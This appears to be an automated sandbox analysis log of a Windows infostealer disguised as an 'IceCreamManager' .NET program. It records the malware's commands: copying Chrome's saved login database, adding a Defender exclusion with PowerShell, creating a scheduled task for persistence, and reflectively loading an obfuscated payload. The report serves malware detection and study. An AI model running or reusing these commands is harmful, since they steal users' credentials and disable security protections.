Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

File created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe

Jump to behavior

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

File created: C:\Users\user\AppData\Local\Temp\tmp280F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/9@7/6

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01

Source: iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp

Source: iuvRyl9i7D.exe

String found in binary or memory: BatchTabLayout#tableLayoutPanel4+ProcessEndOfDayButton!!ProcessEndOfDay1LoadTruckRouteFileButton'!LoadTruckRouteFile3LoadTruckDriverFileButton)!LoadTruckDriverFileOLoadOverallInventoryExtensionFileButtonE!LoadOverallInventoryExtensionFile=LoadOverallInventoryFileButton3!LoadOverallInventoryFile9LoadTruckInventoryFileButton/!LoadTruckInventoryFile/LoadTruckFuelFileButton%!LoadTruckFuelFile'LoadTruckFileButton

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\control.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: iuvRyl9i7D.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: iuvRyl9i7D.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: iuvRyl9i7D.exe, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: dDqpEdJEtzi.exe.0.dr, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.2.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.1.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.2.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.3.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.9.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.2.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.2.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.5.unpack, IceCreamManager/View/MainForm.cs	.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: iuvRyl9i7D.exe, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: dDqpEdJEtzi.exe.0.dr, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 0.0.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 0.2.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.2.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.1.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.2.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.3.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.9.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.2.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.0.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.2.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.5.unpack, IceCreamManager/View/MainForm.cs	.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_00409023 push esi; iretd	12_2_0040902F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_00416B91 push edx; retf	12_2_00416B92
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_00417423 push es; retf	12_2_00417424
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041D672 push eax; ret	12_2_0041D678
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041D67B push eax; ret	12_2_0041D6E2
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041D625 push eax; ret	12_2_0041D678
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041D6DC push eax; ret	12_2_0041D6E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0463D0D1 push ecx; ret	21_2_0463D0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00609023 push esi; iretd	21_2_0060902F
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00616B91 push edx; retf	21_2_00616B92
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00617423 push es; retf	21_2_00617424
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061D672 push eax; ret	21_2_0061D678
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061D67B push eax; ret	21_2_0061D6E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061D625 push eax; ret	21_2_0061D678
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061D6DC push eax; ret	21_2_0061D6E2

Source: initial sample	Static PE information: section name: .text entropy: 7.63421102824
Source: initial sample	Static PE information: section name: .text entropy: 7.63421102824

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

File created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
